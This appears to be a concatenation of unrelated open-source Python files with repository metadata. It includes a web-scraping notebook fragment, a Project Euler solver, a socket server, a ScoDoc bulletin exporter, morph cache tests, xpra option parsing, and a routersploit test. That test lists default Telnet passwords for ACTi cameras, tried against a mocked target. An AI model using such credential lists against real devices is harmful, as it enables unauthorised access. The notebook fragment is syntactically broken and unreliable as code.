for site in loadSite:
# <codecell>
for site in loadSite:
daLink = []
dafile = open('output', 'w')
daLink.append(site)
inter = BeautifulSoup(site)
daLink.append(inter)
geter = inter.text
daLink.append(geter)
beuLink = BeautifulSoup(daLink[0])
print beuLink.a
# <codecell>
for site in loadSite:
print'print site'
inter = BeautifulSoup(site)
print inter.titlefor site in loadSite:
print'print site'
inter = BeautifulSoup(site)
print inter.title
# <codecell>
for site in loadSite:
print'print site'
inter = BeautifulSoup(site)
print inter.title
# <codecell>
# <codecell>
print inter
# <codecell>
print inter
# <headingcell level=2>
# Timetable
# <codecell>
loadUrl = requests.get('http://www.intercity.co.nz/travel-info/timetable/')
# <codecell>
for da in loadUrl:
print da.title()
# <codecell>
selz = BeautifulSoup(da)
# <codecell>
print selz.title
# <codecell>
timez = BeautifulSoup(loadUrl)
# <codecell>
nakedSite = requests.get('http://nakedbus.com/nz/bus/')
# <codecell>
for naked in nakedSite:
print naked
# <codecell>
# <codecell>
| wcmckee/wcmckee-notebook | webData.py | Python | gpl-2.0 | 3,474 |
am = imp.load_source( 'am', 'artifact-manager' )
| paulovn/artifact-manager | test/__init__.py | Python | gpl-2.0 | 50 |
#!/usr/bin/python
"""Project Euler problem 18: maximum top-to-bottom path sum in a triangle.

The original code walked the triangle greedily (always stepping to the
larger of the two children) and, worse, added each visited row's value
twice to the running total.  Greedy descent does not find the maximum
path; the standard solution is bottom-up dynamic programming.
"""

y = '''75
95 64
17 47 82
18 35 87 10
20 04 82 47 65
19 01 23 75 03 34
88 02 77 73 07 63 67
99 65 04 28 06 16 70 92
41 41 26 56 83 40 80 70 33
41 48 72 33 47 32 37 16 94 29
53 71 44 65 25 43 91 52 97 51 14
70 11 33 28 77 73 17 78 39 68 17 57
91 71 52 38 17 14 91 43 58 50 27 29 48
63 66 04 68 89 53 67 30 73 16 69 87 40 31
04 62 98 27 23 09 70 98 73 93 38 53 60 04 23'''


def max_path_total(triangle):
    """Return the largest sum obtainable on a top-to-bottom path.

    triangle -- list of rows, each a list of ints; row i has i+1 entries.
    Works bottom-up: after processing row i, best[j] holds the best total
    achievable starting from position (i, j).  O(n^2) time, O(n) space.
    """
    best = list(triangle[-1])
    for row in reversed(triangle[:-1]):
        best = [value + max(best[j], best[j + 1])
                for j, value in enumerate(row)]
    return best[0]


# Parse the literal above into a list of integer rows.
triangle = [[int(tok) for tok in line.split()] for line in y.split('\n')]

print(max_path_total(triangle))
| generica/euler | 18.py | Python | gpl-2.0 | 782 |
#aqui se creara el servidor para comenzar la conexion
import SocketServer
class MiTcpHandler(SocketServer.BaseRequestHandler):
    """TCP handler that replies with the character count of the received message."""

    # Called once for every incoming connection.
    def handle(self):
        # Receive up to 1024 bytes from the client and strip surrounding whitespace.
        self.oracion=self.request.recv(1024).strip()
        # Count the characters in the sentence and send the count back as text.
        self.num=len(self.oracion)
        self.request.send(str(self.num))
        # NOTE(review): under Python 2 (SocketServer module) this print
        # statement outputs a tuple repr — presumably acceptable debug
        # output; confirm before porting.
        print("Cliente 1 dice:",self.oracion,"caracteres recibidos : ",self.num)
def main():
    """Start a TCP echo-length server on localhost:9999 and serve forever."""
    print("Servidor 1.0\n")
    host="localhost"
    port=9999
    server1=SocketServer.TCPServer((host,port),MiTcpHandler)
    print("Servidor Corriendo...")
    # Blocks handling connections until the process is terminated.
    server1.serve_forever()
main()
| hdrtronic/Socket_python | Servidor.py | Python | gpl-2.0 | 770 |
from routersploit.modules.creds.cameras.acti.telnet_default_creds import Exploit
def test_check_success(generic_target):
    """Test scenario - testing against Telnet server.

    Verifies the module's shipped defaults on a fresh instance, then
    points it at the *generic_target* pytest fixture (a mocked telnet
    service) and exercises check()/check_default()/run().
    """
    exploit = Exploit()
    # Freshly constructed module must expose these default option values.
    assert exploit.target == ""
    assert exploit.port == 23
    assert exploit.threads == 1
    assert exploit.defaults == ["admin:12345", "admin:123456", "Admin:12345", "Admin:123456"]
    assert exploit.stop_on_success is True
    assert exploit.verbosity is True
    # Aim the module at the mocked service and run the credential check.
    exploit.target = generic_target.host
    exploit.port = generic_target.port
    assert exploit.check() is True
    assert exploit.check_default() is not None
    assert exploit.run() is None
| dasseclab/dasseclab | clones/routersploit/tests/creds/cameras/acti/test_telnet_default_creds.py | Python | gpl-2.0 | 672 |
# HRGRN WebServices
# Copyright (C) 2016 Xinbin Dai, Irina Belyaeva
# This file is part of HRGRN WebServices API.
#
# HRGRN API is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# HRGRN API is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with HRGRN API. If not, see <http://www.gnu.org/licenses/>.
"""
Main Module
"""
import json
import requests
import logging
import timer as timer
from requests.exceptions import ConnectionError
from requests import Session
import service as svc
import request_handler as rh
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
# This function acts as a list endpoint
def list(args):
session = Session()
# get service url
svc_url = svc.get_svc_base_url()
params = {'listall': 'T', 'format':'json'}
try:
with timer.Timer() as t:
log.info("Service URL:" + svc_url)
# execute request
response = rh.build_payload(svc_url, params, session)
log.debug(response)
if (response):
for item in response:
print json.dumps(item, indent=3)
print '---'
else:
raise Exception("Response cannot be null!")
except ValueError as e:
error_msg = "ValueError Exception:" + e.message
log.error(error_msg, exc_info=True)
raise Exception(error_msg)
except requests.exceptions.HTTPError as e:
error_msg = "HTTPError Exception:" + e.message
log.error(error_msg, exc_info=True)
raise Exception(error_msg)
except ConnectionError as e:
error_msg = "ConnectionError Exception:" + e.message
log.error(error_msg, exc_info=True)
raise Exception(error_msg)
except Exception as e:
error_msg = "GenericError Exception:" + e.message
log.error(error_msg, exc_info=True)
raise Exception(error_msg)
finally:
log.info('Request took %.03f sec.' % t.interval)
| Arabidopsis-Information-Portal/hrgrn_webservices | services/hrgrn_list_network/main.py | Python | gpl-2.0 | 2,479 |
# ------------------------------------------------------------
# Developping with MicroPython in an async way
#
# ------------------------------------------------------------
# === asyncio tests ===
# ------------------------------------------------------------
print("==== /test/asyncio/test_createkilldye.py")
import logging
log = logging.getlogger("test")
logs = logging.getlogger("scheduler")
logs.setLevel(logging.TRACE)
logging.setGlobal(logging.DEBUG)
loge = logging.getlogger("esp")
loge.setLevel(logging.INFO)
import utime as time,sys
import asyncio
from neopixels import Neopixels
neo = Neopixels(13,4)
neo.brightness = 50
neo.clearBuffer()
# ------------------------------------------------------------
# === Example ===
# ------------------------------------------------------------
total = 0
# 4 tasks
def led0():
    """Scheduler task: toggle the red channel of pixel 0 each period."""
    log.info("Task led0 created!")
    # First yield hands control back to the scheduler after creation.
    yield
    while True:
        neo.toggleR( 0,80 )
        neo.writeBuffer()
        yield
    # NOTE(review): unreachable — the loop above never exits; only
    # relevant if the task is ever restructured.
    log.info("Task led0 dies!")
def led1():
    """Scheduler task: toggle the green channel of pixel 1 each period."""
    yield
    while True:
        neo.toggleG( 1,80 )
        neo.writeBuffer()
        yield
    # NOTE(review): unreachable (see led0).
    log.info("Task led1 dies!")
def led2():
    """Scheduler task: toggle the blue channel of pixel 2 each period."""
    yield
    while True:
        neo.toggleB( 2,80 )
        neo.writeBuffer()
        yield
    # NOTE(review): unreachable (see led0).
    log.info("Task led2 dies!")
def led3():
    """Scheduler task: toggle the red channel of pixel 3 each period.

    NOTE(review): uses toggleR like led0 (not a fourth color) — looks
    intentional for a 4-pixel strip, but confirm.
    """
    yield
    while True:
        neo.toggleR( 3,80 )
        neo.writeBuffer()
        yield
    # NOTE(review): unreachable (see led0).
    log.info("Task led3 dies!")
def master_of_universe():
    """Scheduler task exercising the task API: create led0, kill it,
    then shut down the whole scheduler."""
    yield
    log.info("Creating task led0. Red led goes flashing fast!")
    # Yielding a CreateTask request returns the new task's id.
    tid = yield asyncio.CreateTask( led0(), period = 100, prio = 11 )
    log.info("Kill task led0 with tid %d. Red led stops flashing!",tid)
    yield asyncio.KillTask(tid)
    log.info("Kill the os itself!")
    yield asyncio.KillOs()
    log.info("Task master_of_universe is ready!")
now = time.ticks_ms()
print (now)
# Run them
sched = asyncio.sched
sched.task(led1(), period = 300, time2run = 200)
sched.task(led2(), period = 700, time2run = 300)
sched.task(led3(), period = 4000, time2run = 4000)
sched.task(master_of_universe(), period = 4000, time2run = 4000 )
log.info("test creating killing tasks")
sched.mainloop()
| smeenka/esp32 | lolin32/test/asyncio/test_createkilldye.py | Python | gpl-2.0 | 2,215 |
# -*- mode: python -*-
# -*- coding: iso8859-15 -*-
##############################################################################
#
# Gestion scolarite IUT
#
# Copyright (c) 2001 - 2013 Emmanuel Viennet. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Emmanuel Viennet emmanuel.viennet@viennet.net
#
##############################################################################
"""Génération du bulletin en format JSON (beta, non completement testé)
"""
from notes_table import *
import sco_photos
import ZAbsences
import sco_bulletins
# -------- Bulletin en JSON
import mx
class ScoDocJSONEncoder(json.JSONEncoder):
    """JSON encoder serializing date-like objects as ISO-8601 strings.

    The bulletin data contains mx.DateTime values, which the stock
    encoder cannot handle.  Instead of comparing ``str(type(o))``
    against the mx type's repr (fragile: breaks if the repr ever
    changes), duck-type on ``strftime`` — which also covers
    datetime.datetime / datetime.date for free, backward-compatibly.
    """
    def default(self, o):
        # Anything date-like (mx.DateTime, datetime, date) -> ISO string.
        if hasattr(o, 'strftime'):
            return o.strftime("%Y-%m-%dT%H:%M:%S")
        else:
            log('not mx: %s' % type(o))
            return json.JSONEncoder.default(self, o)
def make_json_formsemestre_bulletinetud(
    context, formsemestre_id, etudid, REQUEST=None,
    xml_with_decisions=False, version='long',
    force_publishing=False # force publication even if the semester is not published on the "portal"
    ):
    """Return the student's bulletin as a JSON string.

    Thin wrapper around formsemestre_bulletinetud_published_dict():
    builds the published dict, sets the JSON content-type on the Zope
    response when a REQUEST is given, and serializes with
    ScoDocJSONEncoder so date values are handled.
    """
    d = formsemestre_bulletinetud_published_dict(
        context, formsemestre_id, etudid,
        force_publishing=force_publishing,
        REQUEST=REQUEST,
        xml_with_decisions=xml_with_decisions, version=version)
    if REQUEST:
        REQUEST.RESPONSE.setHeader('content-type', JSON_MIMETYPE)
    return json.dumps(d, cls=ScoDocJSONEncoder, encoding=SCO_ENCODING)
# (fonction séparée: n'utilise pas formsemestre_bulletinetud_dict()
# pour simplifier le code, mais attention a la maintenance !)
#
def formsemestre_bulletinetud_published_dict(
    context, formsemestre_id, etudid,
    force_publishing=False,
    xml_nodate=False,
    REQUEST=None,
    xml_with_decisions=False, # include jury decisions even if not published
    version='long'
    ):
    """Dictionary holding the _published_ information of the grade bulletin.

    Used for JSON, should also be used for XML. (todo)

    Builds, section by section, the student identity, overall average and
    ranks, per-UE / per-module / per-evaluation details, capitalized UEs,
    absences, jury decision and appreciations — each section included only
    when the semester preferences allow publication.
    """
    d = {}
    sem = context.get_formsemestre(formsemestre_id)
    # The bulletin is published unless the semester hides it (bul_hide_xml),
    # or unless the caller forces publication.
    if sem['bul_hide_xml'] == '0' or force_publishing:
        published=1
    else:
        published=0
    if xml_nodate:
        docdate = ''
    else:
        docdate = datetime.datetime.now().isoformat()
    d.update( etudid=etudid, formsemestre_id=formsemestre_id,
              date=docdate,
              publie=published,
              etape_apo=sem['etape_apo'] or '',
              etape_apo2=sem['etape_apo2'] or '',
              etape_apo3=sem['etape_apo3'] or '',
              etape_apo4=sem['etape_apo4'] or ''
              )
    # Student information
    etudinfo = context.getEtudInfo(etudid=etudid,filled=1)[0]
    d['etudiant'] = dict(
        etudid=etudid, code_nip=etudinfo['code_nip'], code_ine=etudinfo['code_ine'],
        nom=quote_xml_attr(etudinfo['nom']),
        prenom=quote_xml_attr(etudinfo['prenom']),
        sexe=quote_xml_attr(etudinfo['sexe']),
        photo_url=quote_xml_attr(sco_photos.etud_photo_url(context, etudinfo)),
        email=quote_xml_attr(etudinfo['email']))
    # Available for publication?
    if not published:
        return d # stop !
    # Groups:
    partitions = sco_groups.get_partitions_list(context, formsemestre_id, with_default=False)
    partitions_etud_groups = {} # { partition_id : { etudid : group } }
    for partition in partitions:
        pid=partition['partition_id']
        partitions_etud_groups[pid] = sco_groups.get_etud_groups_in_partition(context, pid)
    nt = context._getNotesCache().get_NotesTable(context, formsemestre_id) #> all grades
    ues = nt.get_ues()
    modimpls = nt.get_modimpls()
    nbetuds = len(nt.rangs)
    mg = fmt_note(nt.get_etud_moy_gen(etudid))
    if nt.get_moduleimpls_attente() or context.get_preference('bul_show_rangs', formsemestre_id) == 0:
        # do not show the rank on the bulletin if some grades
        # are still pending in this semester
        rang = ''
        rang_gr = {}
        ninscrits_gr = {}
    else:
        rang = str(nt.get_etud_rang(etudid))
        rang_gr, ninscrits_gr, gr_name = sco_bulletins.get_etud_rangs_groups(
            context, etudid, formsemestre_id, partitions, partitions_etud_groups, nt)
    d['note'] = dict( value=mg, min=fmt_note(nt.moy_min), max=fmt_note(nt.moy_max), moy=fmt_note(nt.moy_moy) )
    d['rang'] = dict( value=rang, ninscrits=nbetuds )
    d['rang_group'] = []
    if rang_gr:
        # One rank entry per partition (TD group, TP group, ...).
        for partition in partitions:
            d['rang_group'].append( dict(
                group_type=partition['partition_name'],
                group_name=gr_name[partition['partition_id']],
                value=rang_gr[partition['partition_id']],
                ninscrits=ninscrits_gr[partition['partition_id']] ))
    d['note_max'] = dict( value=20 ) # grades always out of 20
    d['bonus_sport_culture'] = dict( value=nt.bonus[etudid] )
    # List the UEs / modules / evaluations
    d['ue'] = []
    d['ue_capitalisee'] = []
    for ue in ues:
        ue_status = nt.get_etud_ue_status(etudid, ue['ue_id'])
        u = dict( id=ue['ue_id'],
                  numero=quote_xml_attr(ue['numero']),
                  acronyme=quote_xml_attr(ue['acronyme']),
                  titre=quote_xml_attr(ue['titre']),
                  note = dict(value=fmt_note(ue_status['cur_moy_ue']),
                              min=fmt_note(ue['min']), max=fmt_note(ue['max'])),
                  rang = str(nt.ue_rangs[ue['ue_id']][0][etudid]),
                  effectif = str(nt.ue_rangs[ue['ue_id']][1] - nt.nb_demissions)
                  )
        d['ue'].append(u)
        u['module'] = []
        # List the modules of this UE
        ue_modimpls = [ mod for mod in modimpls if mod['module']['ue_id'] == ue['ue_id'] ]
        for modimpl in ue_modimpls:
            mod_moy = fmt_note(nt.get_etud_mod_moy(modimpl['moduleimpl_id'], etudid))
            if mod_moy == 'NI': # skip modules the student is not enrolled in
                continue
            mod = modimpl['module']
            #if mod['ects'] is None:
            #    ects = ''
            #else:
            #    ects = str(mod['ects'])
            modstat = nt.get_mod_stats(modimpl['moduleimpl_id'])
            m = dict(
                id=modimpl['moduleimpl_id'], code=mod['code'],
                coefficient=mod['coefficient'],
                numero=mod['numero'],
                titre=quote_xml_attr(mod['titre']),
                abbrev=quote_xml_attr(mod['abbrev']),
                # ects=ects, module ECTS now unused
                note = dict( value=mod_moy )
                )
            m['note'].update(modstat)
            for k in ('min', 'max', 'moy'): # format all grades
                m['note'][k] = fmt_note(m['note'][k])
            u['module'].append(m)
            if context.get_preference('bul_show_mod_rangs', formsemestre_id):
                m['rang'] = dict( value=nt.mod_rangs[modimpl['moduleimpl_id']][0][etudid] )
                m['effectif'] = dict( value=nt.mod_rangs[modimpl['moduleimpl_id']][1] )
            # --- grades of each evaluation:
            evals = nt.get_evals_in_mod(modimpl['moduleimpl_id'])
            m['evaluation'] = []
            if version != 'short':
                for e in evals:
                    if e['visibulletin'] == '1' or version == 'long':
                        val = e['notes'].get(etudid, {'value':'NP'})['value'] # NA if student withdrew
                        val = fmt_note(val, note_max=e['note_max'] )
                        m['evaluation'].append( dict(
                            jour=DateDMYtoISO(e['jour'], null_is_empty=True),
                            heure_debut=TimetoISO8601(e['heure_debut'], null_is_empty=True),
                            heure_fin=TimetoISO8601(e['heure_fin'], null_is_empty=True),
                            coefficient=e['coefficient'],
                            evaluation_type=e['evaluation_type'],
                            description=quote_xml_attr(e['description']),
                            note = val
                            ))
            # Incomplete or future evaluations:
            complete_eval_ids = Set( [ e['evaluation_id'] for e in evals ] )
            if context.get_preference('bul_show_all_evals', formsemestre_id):
                all_evals = context.do_evaluation_list(args={ 'moduleimpl_id' : modimpl['moduleimpl_id'] })
                all_evals.reverse() # oldest first
                for e in all_evals:
                    if e['evaluation_id'] not in complete_eval_ids:
                        m['evaluation'].append( dict(
                            jour=DateDMYtoISO(e['jour'], null_is_empty=True),
                            heure_debut=TimetoISO8601(e['heure_debut'], null_is_empty=True),
                            heure_fin=TimetoISO8601(e['heure_fin'], null_is_empty=True),
                            coefficient=e['coefficient'],
                            description=quote_xml_attr(e['description']),
                            incomplete='1') )
        # Capitalized UE (listed only if better than the current UE)
        if ue_status['is_capitalized']:
            d['ue_capitalisee'].append( dict(
                id=ue['ue_id'],
                numero=quote_xml_attr(ue['numero']),
                acronyme=quote_xml_attr(ue['acronyme']),
                titre=quote_xml_attr(ue['titre']),
                note = fmt_note(ue_status['moy']),
                coefficient_ue = fmt_note(ue_status['coef_ue']),
                date_capitalisation = DateDMYtoISO(ue_status['event_date'])
                ))
    # --- Absences
    if context.get_preference('bul_show_abs', formsemestre_id):
        debut_sem = DateDMYtoISO(sem['date_debut'])
        fin_sem = DateDMYtoISO(sem['date_fin'])
        AbsEtudSem = ZAbsences.getAbsSemEtud(context, formsemestre_id, etudid)
        nbabs = AbsEtudSem.CountAbs()
        nbabsjust = AbsEtudSem.CountAbsJust()
        d['absences'] = dict(nbabs=nbabs, nbabsjust=nbabsjust)
    # --- Jury decision
    if context.get_preference('bul_show_decision', formsemestre_id) or xml_with_decisions:
        infos, dpv = sco_bulletins.etud_descr_situation_semestre(
            context, etudid, formsemestre_id, format='xml',
            show_uevalid=context.get_preference('bul_show_uevalid',formsemestre_id))
        d['situation'] = quote_xml_attr(infos['situation'])
        if dpv:
            decision = dpv['decisions'][0]
            etat = decision['etat']
            if decision['decision_sem']:
                code = decision['decision_sem']['code']
            else:
                code = ''
            d['decision'] = dict( code=code, etat=etat)
            d['decision_ue'] = []
            if decision['decisions_ue']: # and context.get_preference('bul_show_uevalid', formsemestre_id): always publish (useful for the Apogee export)
                for ue_id in decision['decisions_ue'].keys():
                    ue = context.do_ue_list({ 'ue_id' : ue_id})[0]
                    d['decision_ue'].append(dict(
                        ue_id=ue['ue_id'],
                        numero=quote_xml_attr(ue['numero']),
                        acronyme=quote_xml_attr(ue['acronyme']),
                        titre=quote_xml_attr(ue['titre']),
                        code=decision['decisions_ue'][ue_id]['code'],
                        ects=quote_xml_attr(ue['ects'] or '')
                        ))
            d['autorisation_inscription'] = []
            for aut in decision['autorisations']:
                d['autorisation_inscription'].append(dict( semestre_id=aut['semestre_id'] ))
        else:
            # No jury data: the student withdrew (demission).
            d['decision'] = dict( code='', etat='DEM' )
    # --- Appreciations
    cnx = context.GetDBConnexion()
    apprecs = scolars.appreciations_list(
        cnx,
        args={'etudid':etudid, 'formsemestre_id' : formsemestre_id } )
    d['appreciation'] = []
    for app in apprecs:
        d['appreciation'].append( dict( comment=quote_xml_attr(app['comment']), date=DateDMYtoISO(app['date'])) )
    #
    return d
| denys-duchier/Scolar | sco_bulletins_json.py | Python | gpl-2.0 | 13,221 |
# Copyright (C) 2012-2015 Codethink Limited
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import urllib2
import os
import cliapp
import fs.memoryfs
import morphlib
import morphlib.gitdir_tests
class FakeApplication(object):

    """Minimal stand-in for the morph application object.

    Exposes only what LocalRepoCache touches: a settings mapping and a
    no-op status() method.
    """

    def __init__(self):
        self.settings = {'verbose': True}

    def status(self, msg):
        pass
class LocalRepoCacheTests(unittest.TestCase):

    """Unit tests for LocalRepoCache using an in-memory filesystem.

    git invocations, tarball fetching and tempdir creation are all
    replaced by fakes, so no subprocess or network access happens.
    """

    def setUp(self):
        aliases = ['upstream=git://example.com/#example.com:%s.git']
        repo_resolver = morphlib.repoaliasresolver.RepoAliasResolver(aliases)
        tarball_base_url = 'http://lorry.example.com/tarballs/'
        self.reponame = 'upstream:reponame'
        self.repourl = 'git://example.com/reponame'
        escaped_url = 'git___example_com_reponame'
        self.tarball_url = '%s%s.tar' % (tarball_base_url, escaped_url)
        self.cachedir = '/cache/dir'
        self.cache_path = '%s/%s' % (self.cachedir, escaped_url)
        self.remotes = {}
        self.fetched = []
        self.removed = []
        self.lrc = morphlib.localrepocache.LocalRepoCache(
            FakeApplication(), self.cachedir, repo_resolver, tarball_base_url)
        # Replace all side-effecting collaborators with fakes.
        self.lrc.fs = fs.memoryfs.MemoryFS()
        self.lrc._git = self.fake_git
        self.lrc._fetch = self.not_found
        self.lrc._mkdtemp = self.fake_mkdtemp
        self.lrc._new_cached_repo_instance = self.new_cached_repo_instance
        self._mkdtemp_count = 0

    def fake_git(self, args, **kwargs):
        # Simulate only the git invocations LocalRepoCache makes,
        # recording remote URLs in self.remotes instead of running git.
        if args[0] == 'clone':
            self.assertEqual(len(args), 5)
            remote = args[3]
            local = args[4]
            self.remotes['origin'] = {'url': remote, 'updates': 0}
            self.lrc.fs.makedir(local, recursive=True)
        elif args[0:2] == ['remote', 'set-url']:
            remote = args[2]
            url = args[3]
            self.remotes[remote] = {'url': url}
        elif args[0:2] == ['config', 'remote.origin.url']:
            remote = 'origin'
            url = args[2]
            self.remotes[remote] = {'url': url}
        elif args[0:2] == ['config', 'remote.origin.mirror']:
            remote = 'origin'
        elif args[0:2] == ['config', 'remote.origin.fetch']:
            remote = 'origin'
        else:
            raise NotImplementedError()

    def fake_mkdtemp(self, dirname):
        # Deterministic replacement for tempfile.mkdtemp: foo0, foo1, ...
        thing = "foo"+str(self._mkdtemp_count)
        self._mkdtemp_count += 1
        self.lrc.fs.makedir(dirname+"/"+thing)
        return thing

    def new_cached_repo_instance(self, *args):
        # Build CachedRepo objects without requiring a real git repo on disk.
        with morphlib.gitdir_tests.allow_nonexistant_git_repos():
            return morphlib.cachedrepo.CachedRepo(
                FakeApplication(), *args)

    def not_found(self, url, path):
        # Default fetch fake: behave as if the tarball URL 404s.
        raise cliapp.AppException('Not found')

    def test_has_not_got_shortened_repo_initially(self):
        self.assertFalse(self.lrc.has_repo(self.reponame))

    def test_has_not_got_absolute_repo_initially(self):
        self.assertFalse(self.lrc.has_repo(self.repourl))

    def test_caches_shortened_repository_on_request(self):
        self.lrc.cache_repo(self.reponame)
        self.assertTrue(self.lrc.has_repo(self.reponame))
        self.assertTrue(self.lrc.has_repo(self.repourl))

    def test_caches_absolute_repository_on_request(self):
        self.lrc.cache_repo(self.repourl)
        self.assertTrue(self.lrc.has_repo(self.reponame))
        self.assertTrue(self.lrc.has_repo(self.repourl))

    def test_cachedir_does_not_exist_initially(self):
        self.assertFalse(self.lrc.fs.exists(self.cachedir))

    def test_creates_cachedir_if_missing(self):
        self.lrc.cache_repo(self.repourl)
        self.assertTrue(self.lrc.fs.exists(self.cachedir))

    def test_happily_caches_same_repo_twice(self):
        self.lrc.cache_repo(self.repourl)
        self.lrc.cache_repo(self.repourl)

    def test_fails_to_cache_when_remote_does_not_exist(self):
        def fail(args, **kwargs):
            self.lrc.fs.makedir(args[4])
            raise cliapp.AppException('')
        self.lrc._git = fail
        self.assertRaises(morphlib.localrepocache.NoRemote,
                          self.lrc.cache_repo, self.repourl)

    def test_does_not_mind_a_missing_tarball(self):
        self.lrc.cache_repo(self.repourl)
        self.assertEqual(self.fetched, [])

    def test_fetches_tarball_when_it_exists(self):
        self.lrc._fetch = lambda url, path: self.fetched.append(url)
        self.unpacked_tar = ""
        self.mkdir_path = ""
        # Skip CachedRepo.update so no real git fetch is attempted.
        with morphlib.gitdir_tests.monkeypatch(
                morphlib.cachedrepo.CachedRepo, 'update', lambda self: None):
            self.lrc.cache_repo(self.repourl)
        self.assertEqual(self.fetched, [self.tarball_url])
        self.assertFalse(self.lrc.fs.exists(self.cache_path + '.tar'))
        self.assertEqual(self.remotes['origin']['url'], self.repourl)

    def test_gets_cached_shortened_repo(self):
        self.lrc.cache_repo(self.reponame)
        cached = self.lrc.get_repo(self.reponame)
        self.assertTrue(cached is not None)

    def test_gets_cached_absolute_repo(self):
        self.lrc.cache_repo(self.repourl)
        cached = self.lrc.get_repo(self.repourl)
        self.assertTrue(cached is not None)

    def test_get_repo_raises_exception_if_repo_is_not_cached(self):
        self.assertRaises(Exception, self.lrc.get_repo, self.repourl)

    def test_escapes_repourl_as_filename(self):
        escaped = self.lrc._escape(self.repourl)
        self.assertFalse('/' in escaped)

    def test_noremote_error_message_contains_repo_name(self):
        e = morphlib.localrepocache.NoRemote(self.repourl, [])
        self.assertTrue(self.repourl in str(e))

    def test_avoids_caching_local_repo(self):
        self.lrc.fs.makedir('/local/repo', recursive=True)
        self.lrc.cache_repo('file:///local/repo')
        cached = self.lrc.get_repo('file:///local/repo')
        assert cached.path == '/local/repo'
| nuxeh/morph | morphlib/localrepocache_tests.py | Python | gpl-2.0 | 6,502 |
# This file is part of Parti.
# Copyright (C) 2008 Nathaniel Smith <njs@pobox.com>
# Parti is released under the terms of the GNU GPL v2, or, at your option, any
# later version. See the file COPYING for details.
import gobject
import sys
import os
import socket
import time
from optparse import OptionParser
import logging
from subprocess import Popen, PIPE
import xpra
from xpra.bencode import bencode
from xpra.dotxpra import DotXpra
from xpra.platform import (XPRA_LOCAL_SERVERS_SUPPORTED,
DEFAULT_SSH_CMD,
GOT_PASSWORD_PROMPT_SUGGESTION)
from xpra.protocol import TwoFileConnection, SocketConnection
def nox():
    """Ensure no X11 display is used: drop $DISPLAY and promote the
    'could not open display' warning to a hard error."""
    os.environ.pop("DISPLAY", None)
    # This is already an error on Fedora/RH; make it an error on every
    # platform so the problem gets noticed.
    import warnings
    warnings.filterwarnings("error", "could not open display")
def main(script_file, cmdline):
    """Command-line entry point: parse cmdline and dispatch to the
    requested mode (start/attach/stop/list/upgrade/_proxy).

    script_file -- path of the invoking script (handed to the server
                   code); cmdline -- full argv including program name.
    """
    #################################################################
    ## NOTE NOTE NOTE
    ##
    ## If you modify anything here, then remember to update the man page
    ## (xpra.1) as well!
    ##
    ## NOTE NOTE NOTE
    #################################################################
    # Server-only modes are advertised in the usage string only when
    # this platform can start local servers.
    if XPRA_LOCAL_SERVERS_SUPPORTED:
        start_str = "\t%prog start DISPLAY\n"
        list_str = "\t%prog list\n"
        upgrade_str = "\t%prog upgrade DISPLAY"
        note_str = ""
    else:
        start_str = ""
        list_str = ""
        upgrade_str = ""
        note_str = "(This xpra install does not support starting local servers.)"
    parser = OptionParser(version="xpra v%s" % xpra.__version__,
                          usage="".join(["\n",
                                         start_str,
                                         "\t%prog attach [DISPLAY]\n",
                                         "\t%prog stop [DISPLAY]\n",
                                         list_str,
                                         upgrade_str,
                                         note_str]))
    # Server-side options only make sense where local servers exist.
    if XPRA_LOCAL_SERVERS_SUPPORTED:
        parser.add_option("--start-child", action="append",
                          dest="children", metavar="CMD",
                          help="program to spawn in new server (may be repeated)")
        parser.add_option("--exit-with-children", action="store_true",
                          dest="exit_with_children", default=False,
                          help="Terminate server when --start-child command(s) exit")
        parser.add_option("--no-daemon", action="store_false",
                          dest="daemon", default=True,
                          help="Don't daemonize when running as a server")
        parser.add_option("--xvfb", action="store",
                          dest="xvfb", default="Xvfb", metavar="CMD",
                          help="How to run the headless X server (default: '%default')")
        parser.add_option("--bind-tcp", action="store",
                          dest="bind_tcp", default=None,
                          metavar="[HOST]:PORT",
                          help="Listen for connections over TCP (insecure)")
    parser.add_option("-z", "--compress", action="store",
                      dest="compression_level", type="int", default=3,
                      metavar="LEVEL",
                      help="How hard to work on compressing data."
                      + " 0 to disable compression,"
                      + " 9 for maximal (slowest) compression. Default: %default.")
    parser.add_option("--ssh", action="store",
                      dest="ssh", default=DEFAULT_SSH_CMD, metavar="CMD",
                      help="How to run ssh (default: '%default')")
    parser.add_option("--remote-xpra", action="store",
                      dest="remote_xpra", default=".xpra/run-xpra",
                      metavar="CMD",
                      help="How to run xpra on the remote host (default: '%default')")
    parser.add_option("-d", "--debug", action="store",
                      dest="debug", default=None, metavar="FILTER1,FILTER2,...",
                      help="List of categories to enable debugging for (or \"all\")")
    (options, args) = parser.parse_args(cmdline[1:])
    if not args:
        parser.error("need a mode")
    # Configure logging before dispatching.  Each listed category gets
    # DEBUG; a leading '-' resets that category back to INFO.
    logging.root.setLevel(logging.INFO)
    if options.debug is not None:
        categories = options.debug.split(",")
        for cat in categories:
            if cat.startswith("-"):
                logging.getLogger(cat[1:]).setLevel(logging.INFO)
            # NOTE(review): for a '-cat' entry this still sets a logger
            # literally named '-cat' to DEBUG afterwards — looks
            # unintended (missing continue?); confirm against upstream.
            if cat == "all":
                logger = logging.root
            else:
                logger = logging.getLogger(cat)
            logger.setLevel(logging.DEBUG)
